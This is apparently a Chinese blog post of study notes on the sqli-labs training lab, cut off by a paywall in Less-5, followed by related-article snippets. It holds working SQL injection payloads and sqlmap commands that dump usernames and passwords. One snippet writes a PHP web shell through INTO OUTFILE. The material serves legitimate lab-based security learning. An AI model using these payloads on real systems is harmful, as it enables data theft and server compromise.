sqli-labs学习笔记(Less1-Less24)

最新推荐文章于 2025-06-06 15:34:13 发布
最新推荐文章于 2025-06-06 15:34:13 发布
阅读量1.2k 收藏 1
点赞数 2
CC 4.0 BY-SA版权
分类专栏: SQL注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_42280544/article/details/86771692
本文详细记录了sqli-labs的前24关实战过程,涵盖了GET和POST方式的各种SQL注入攻击,包括错误提示型、整数型、单引号、双引号、布尔型、时间延迟型等多种类型的注入方法。通过这些实战案例,深入理解SQL注入的原理和防御策略。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

sqli-labs学习笔记

Less-1 GET - Error based - Single quotes - String

select … from … where id=’$id’

基于union联合查询

http://127.0.0.1/sqli-labs-master/Less-1/?id=0
在这里插入图片描述
报错
http://127.0.0.1/sqli-labs-master/Less-1/?id=0’ order by 3–+
在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

(0x3a:0x是十六进制标志,3a是十进制的58,是ascii中的 ‘:’ ,用以分割pasword和username)

在这里插入图片描述

使用sqlmap跑:

sqlmap -u “127.0.0.1/sqli-labs-master/Less-1/?id=1” --current-db

  • 跑出当前数据库

在这里插入图片描述
sqlmap -u “127.0.0.1/sqli-labs-master/Less-1/?id=1” -D security --tables

  • 爆出表名

在这里插入图片描述
sqlmap -u “127.0.0.1/sqli-labs-master/Less-1/?id=1” -D security -T users --columns

  • 爆出列名

在这里插入图片描述
sqlmap -u “127.0.0.1/sqli-labs-master/Less-1/?id=1” -D security -T users -C id,password,username --dump

  • 爆出字段
    在这里插入图片描述

Less-2 GET - Error based - Intiger based

当输入id=1‘值时,发现所输入的id值全部都带入进去了

在这里插入图片描述

猜测出:select … from … where id=$id
所以,将id=1’中的单引号去掉,然后按less-1的步骤进行报表即可
Payload:

http://爆出字段
http://127.0.0.1/sqli-labs-master/Less-3/?id=0’) union select 1,2,group_concat(username,0x3a,password) from users–+

在这里插入图片描述

Less-3 GET - Error based - Single quotes with twist string

当输入id=1’值时,发现输出的报错会自动加上一个右括号
在这里插入图片描述
猜测出:select … from … where id=(’$id’)
,所以,将id=1’中的单引号去掉,然后按less-1的步骤进行报表即可
Payload:

在这里插入图片描述

Less-4 GET - Error based - Double Quotes - String

当输入id=1’值时,发现不报错,输入id=1”
在这里插入图片描述
猜测出:select … from … where id=("$id")
一一
Payload:

http://127.0.0.1/sqli-labs-master/Less-3/?id=0”) union select 1,2,database()–+

在这里插入图片描述

Less-5 GET - Double Injection - Single Quotes - String

当输入id=1’时出现
在这里插入图片描述

猜测其应该是布尔型盲注、报错型注入、时间延迟型盲注中的一种,构造时间延迟盲注payload:

http://127.0.0.1/sqli-labs-master/Less-5/?id=1’ and sleep(5)–+

发现有明显延迟,说明其是时间延迟注入类型,构造爆破Payload:
http://127.0.0.1/sqli-labs-master/Less-5/?id=1’ and sleep(5) order by 3–+

时间延迟型手工注入,正确会延迟,错误没有延迟。
本方法中payloa

最低0.47元/天 解锁文章

200万优质内容无限畅学
sqli-labs靶场less-1
wanggonghanfei的博客
09-29 371
在url后面写?id=1,有回显,输入?id=2,也有回显,输入?id=0,回显判断有注入加单引号:?id=1’报错,从 ’ ‘1’ ’ LIMIT 0,1’ 可以得知,多一个单引号,怀疑为数字型注入因为单引号需要闭合,同时原先查询语句的单引号需要注释掉,构造语句第一个单引号闭合sql语句的查询,–注释掉原先语句的的单引号,+在表示空格,回显:构造:?id=1’ and 1=2 --+,回显:确定为数字型注入。
网络安全-sqlmap实战之sqlilabs-Less8_sqli-labs-master less-8 select from users where
2401_84254087的博客
05-02 179
当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。网安所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。观看零基础学习视频,看视频学习是最快捷也是最有效果的方式,跟着视频中老师的思路,从基础到深入,还是很容易入门的。添加–dbms参数,–technique参数。使用-o参数优化,–batch参数进行跳过。
Sqli-labs less 24
weixin_34362790的博客
08-11 473
Less-24 Ps:本关可能会有朋友和我遇到一样的问题,登录成功以后没有修改密码的相关操作。此时造成问题的主要原因是logged-in.php文件不正确。可重新下载解压,解压过程中要主要要覆盖。 本关为二次排序注入的示范例。二次排序注入也成为存储型的注入,就是将可能导致sql注入的字符先存入到数据库中,当再次调用这个恶意构造的字符时,就可以出发sql注入。二次排序注入思路: 1.黑...
sqli-labs 1 Less-1通关详解
m0_74135202的博客
06-06 306
【代码】sqli-labs 1 Less-1通关详解。
sqli-labs学习笔记
shayebudon的博客
10-06 1878
简单的SQL注入 选择:2017 A1 Extract Data-User info 在登录界面就可以使用SQL语句,以此来检查下平台是否搭建成功 用户名框输入一个“\”,点击确认键,可以看到报错信息,并且可以看到SQL语句,说明存在SQL注入,此处无过滤。 可以通过查看报错信息中的SQL语句,选择进行SQL注入的方式,这里可以看到这样的一行: 那么,选择在用户名输入处输入“‘ or 1=1 #”,通过使用“or”字句将输入匹配取消,并使用“#”将后续语句中对passwo...
Sqli-labs--学习笔记
小人物的博客
05-15 345
数据库的连接函数:concat和concat_ws; concat_ws的第一个参数是连接字符串的分隔符。 user():返回当前数据库连接使用的用户 database():返回当前数据库连接使用的数据库 version():返回当前数据库的版本 127.0.0.1/sqli-labs/Less-1/?id=-1’ union select 1,2,concat_ws(char(32,5...
sqli-labs(less-1)
墨鱼菜鸡
09-10 581
目录 less-1(union联合注入) 1.根据注入位置数据类型将sql注入分类(以localhost/sqli-labs/less-1为例子) 2.利用order判断字段数 3.利用union select 联合查询,将id值设置成不成立,即可探测到可利用的字段数 4.利用函数database(),user(),version()可以得到...
sqli-labs靶场练习笔记
11-09
- **示例**:`http://127.0.0.1/sqli-labs-master/less-7/?id=-1')) union select 1,2,'($_POST["lcy"]);?>' into outfile 'D:\\phpstudy_pro\\WWW\\sqli-labs-master\\Less-7\\1.php'--`。 - **第8关:基于延迟的...
sqli-labs学习笔记(六)less 17 绕过过滤
闵行小鱼塘
09-10 794
继续学习sqli-labs,本篇是less17
sqli-labs学习笔记(十一)less 32-37 宽字节注入
闵行小鱼塘
09-18 775
继续学习sqli-labs,本篇是less 32-37
sqli-labs新手学习笔记(持续更新)
zydbk123456的博客
10-05 511
sqli-labs环境安装 下载地址:https://github.com/Audi-1/sqli-labs 同时需要安装phpstudy 开始前遇到的问题 启动phpstudy,发现apache服务可以正常启动,但MySQL就不行。但是打开任务管理器发现MySQL服务一直在正常运行。查了一下有这种问题原因,可能是因为之前已经安装了MySQL服务,需要在cmd 窗口下输入 sc delete m...
sqli-labs (less23-less24)
Xi4or0uji
08-04 714
less 23 报错注入&过滤注释符 这关后台查询语句是select xxx form xxx where id='$_GET['id']' limit 0,1 讲道理其实跟之前的差不多的,只是对--,#这些注释的符号进行了过滤 所以最后的payload就是 ?id=-1' or extractvalue(1,concat('~',(select schema_name from...
Sqli-labsLess-1
m0_46315342的博客
06-04 376
我们先来看看这个环境有哪些题: 接下来开始我们的学习之旅吧!                                   ...
SQLi-LABS less-1
qq_37529822的博客
05-30 211
SQLi-LABS less-1通关总结(纯小白向) 先来看看题目 新的改变 我们对Markdown编辑器进行了一些功能拓展与语法支持,除了标准的Markdown编辑器功能,我们增加了如下几点新功能,帮助你用它写博客: 全新的界面设计 ,将会带来全新的写作体验; 在创作中心设置你喜爱的代码高亮样式,Markdown 将代码片显示选择的高亮样式 进行展示; 增加了 图片拖拽 功能,你可以将本地的图片直接拖拽到编辑区域直接展示; 全新的 KaTeX数学公式 语法; 增加了支持甘特图的mermaid语法1
sqli-labs less-1
zbbjya的博客
02-08 532
请输入id作为带数值的参数 ==================================================----------======= 输入 ?id=1 我们会看到这个sql语句是我们添加进去的,原本是应该没有的 limit 0.1;其中第一位是从第几个开始的,比如0代表从第一个开始,而第二位的1代表的就是显示多少个数据 再输入加一个单引号我们会发现报错了 ​ ?id=1' 一个一个的试 127.0.0...
Sqli-labs Less-1
Jiajiajiang_的博客
11-02 371
基于错误的SQL注入 Less-1 Less-1 基于错误的单引号注入 1、测试漏洞是否存在 1)id=1时,正常执行 http://127.0.0.1/sqlilabs/Less-1/?id=1 2)id=1'时,报错,说明可能存在SQL注入 http://127.0.0.1/sqlilabs/Less-1/?id=1' 从上述错误当中,我们可以看到提交到SQL语句...
sqli-labs less-01
qq_21193587的博客
05-13 4748
Less-1 提示 用 ID=数字做为输入参数 http://192.168.80.131/Less-1/?id=1 加个’测试。直接显示了 SQL 语法错误,说明这是一个注入点。 id 虽然输入为数值 这里看源码或尝试 id=1’ and 1=1 --+ 和 ’ and 1=2 --+ 结果不同 sql="SELECT∗FROMusersWHEREid=′sql="SELECT * FROM users WHERE id='sql="SELECT∗FROMusersWHEREid=′id’ LIM
1.sqli-labsLess1
qwsn
03-13 1548
一、判断注入类型: ?id=1 ?id=1’ ?id=1’and’1 ?id=1’and’1’=‘2 ?id=1’or’1 ?id=1’or’1’='2 //字符型注入,且单引号没被过滤,且可以手动闭合 ?id=1’and’1’# ?id=1’and’1’– //注释符被过滤 二、猜解字段数和回显位 ?id=1’union select 1’ ?id=1’union select 1,2’ ?id...
sqli-labsless1
weixin_44791273的博客
09-10 283
题目提示输入id作为参数数值 浏览器通常使用 ? 来表示GET方法传递参数,而使用POST传递参数是不会显示到URL中的。 首先尝试传递 id=0 传递id=1试一下 发现查询成功,证明1是存在的 下面接着以0为例子 加上 ‘ 来试试 %27 是指 ’ 的编码 发现页面回显且报错 报错信息的最后面的内容:use near ’‘0’‘ LIMIT 0,1’ at line 1 ,仔细观察,我们都知道php的语句如果有 ’ 的话,肯定要有另一个 ‘ 来进行闭合,不然就是不完整的语句。那我们不妨.
打通关sqli-labs靶场,熟悉sqli语法并且做好笔记
最新发布
07-22
### SQL注入基础与sqli-labs靶场学习指南 SQL注入是一种常见的Web安全漏洞,攻击者通过在输入字段中注入恶意SQL代码,从而操控后端数据库,获取、篡改或删除敏感数据。为了系统性地学习和掌握SQL注入技术,可以使用 **sqli-labs** 靶场进行实战训练。该靶场由一系列基于不同注入类型的挑战组成,适合从基础到进阶的全面学习。 #### sqli-labs 环境搭建 sqli-labs 是一个基于PHP/MySQL的SQL注入练习平台,使用前需要配置好Web环境,例如: - 安装 XAMPP 或 WAMP 等本地服务器环境 - 下载 sqli-labs 项目并部署到 `htdocs` 目录 - 启动 Apache 和 MySQL 服务 - 访问 `http://localhost/sqlilabs` 安装数据库并初始化数据 完成环境搭建后,即可开始逐关挑战。 #### 注入类型判断 在开始每一关挑战时,首先应判断是否存在SQL注入漏洞以及注入类型。常见方法包括: - **正常输入与错误输入对比**:输入正常数据和特殊字符(如 `'`、`"`、`')` 等),观察页面是否报错或行为异常。 - **报错注入**:利用数据库报错信息返回数据,例如使用 `UpdateXML()`、`ExtractValue()` 等函数。 - **联合查询注入(UNION Query Injection)**:通过 `UNION SELECT` 查询获取额外数据。 - **布尔盲注**:通过构造布尔条件判断数据库内容。 - **时间盲注**:使用 `SLEEP()` 等函数判断数据库响应时间差异。 #### 判断SQL查询结果列数 在联合注入中,需要确保注入的 `SELECT` 语句与原查询列数一致。常用方法如下: - 使用 `ORDER BY` 猜测列数:例如 `?id=1' ORDER BY 3 --+`,若页面正常则列数大于等于3;若报错则小于3。 - 使用 `UNION SELECT` 配合 `NULL` 值进行验证:例如 `?id=-1' UNION SELECT NULL, NULL, NULL --+`,逐步增加 `NULL` 数量以匹配实际列数。 #### 报错注入实践(以 UpdateXML 为例) 在某些关卡中,无法直接通过联合注入获取数据,但可通过报错注入方式提取信息: ```sql ? id=1' AND (SELECT 1 FROM (SELECT COUNT(*), CONCAT((SELECT DATABASE()), FLOOR(RAND(0)*2)) x FROM INFORMATION_SCHEMA.COLUMNS GROUP BY x) a) --+ ``` 该语句会尝试执行一个会报错的查询,并将数据库名回显在错误信息中。若信息被截断,可使用 `RIGHT()` 函数进行偏移读取完整内容: ```sql ? id=1' AND (SELECT 1 FROM (SELECT COUNT(*), CONCAT(RIGHT((SELECT DATABASE()), 10), FLOOR(RAND(0)*2)) x FROM INFORMATION_SCHEMA.COLUMNS GROUP BY x) a) --+ ``` #### 爆破表名与列名 一旦确认注入点,可尝试从 `INFORMATION_SCHEMA` 中提取数据库结构信息: - **爆破数据库名**: ```sql ? id=1' UNION SELECT schema_name, NULL FROM information_schema.schemata LIMIT 0,1 --+ ``` - **爆破表名**(以数据库名为 `security` 为例): ```sql ? id=1' UNION SELECT table_name, NULL FROM information_schema.tables WHERE table_schema='security' LIMIT 0,1 --+ ``` - **爆破列名**(以表名为 `users` 为例): ```sql ? id=1' UNION SELECT column_name, NULL FROM information_schema.columns WHERE table_name='users' LIMIT 0,1 --+ ``` #### 数据提取 在获取列名后,即可提取具体数据: ```sql ? id=1' UNION SELECT username, password FROM users --+ ``` 若页面回显区域有限,可使用 `RIGHT()`、`SUBSTRING()` 等函数分段提取长字符串。 #### 工具辅助与深入学习 虽然手工注入有助于理解原理,但在实际渗透测试中,推荐使用自动化工具如 **sqlmap**,它支持多种注入方式和数据库类型,命令示例如下: ```bash sqlmap -u "http://localhost/Less-1/?id=1" --batch --risk=3 --level=5 --dbs ``` 该命令将扫描目标URL的注入点并列出数据库。 若希望深入掌握SQL注入原理,建议结合手工注入与工具使用,理解每一步的注入逻辑,并尝试使用PHP等语言编写简单的数据库查询脚本,模拟注入过程。 --- ###
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值